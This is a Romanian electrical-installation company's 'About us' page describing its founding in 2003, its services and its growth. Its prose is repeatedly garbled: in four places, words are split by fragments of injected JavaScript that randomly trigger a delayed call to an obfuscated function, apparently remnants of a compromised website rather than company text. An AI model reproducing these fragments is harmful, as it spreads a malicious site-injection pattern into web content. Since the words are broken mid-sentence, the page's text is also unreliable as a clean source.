Despre noi

Bine ati venit pe SCANELECTRIC

Scan Electric este infiintata in anul 2003, membrii actionariatului si angajatii avandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and o bogata experienta in domeniul instalatiilor electrice.Inca de la inceput , activitatea s-a axat atat pe fabricatia de echipamente electrice (tablouri de distributie si automatizare) cat si pe constructia de instalatii electrice, urmarindu-se oferirea de solutii complete, la cheie.

Cine suntem?

ScanElectric este o societate cu capital integral romanesc, infiintata in anul 2003. Membrii actionariatului si angajatii societatii avandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and o experienta bogata in domeniul instalatiilor electrice, au reusit sa formeze sis a pastreze o echipa omogena avandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and ca principii de baza profesionalismul si garantia lucrurilor bine facute.

Cu ce ne ocupam?

Activitatea este axata pe fabricarea de echipamente electrice (tablouri de
distributiesi automatizari) si pe constructia de instalatii electrice
complete. Domeniul de activitate se structureaza astfel:

-Consultanta si proiectare instalatii de joasa si medie tensiune;

-Constructii de instalatii electrice de forta, prize si iluminat obiective
civile si industrial;

-Echipamente electrice si automatizari;

Echipa experimentata

Cunoastem necesitatile dumneavoastra si exigentele pietei!

Servicii de calitate

Calitatea este cel mai important avantaj competitiv al unei companii!

Pret accesibil

Un alt motiv pentru care ai alege sa colaborezi cu noi, este pretul corect al serviciilor.

Evolutie

ScanElectric aniverseaza 14 ani de activitate pe piata romaneasca.

In tot acest timp am reusit sa ne mentinem standom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andardele la cel mai inalt nivel, dovada fiind cifra de afaceri care a avut o crestere anuala constanta de cel putin 50% si diversificarea ofertei in functie de cerintele pietei. O alta dovada a competitivitatii firmei, este colaborarea deja devenita traditie cu parteneri de renume din diverse domenii de activitate(domeniul constructiilor, domeniul petrolier,industrie, telecomunicatii, servicii publice s.a.m.d)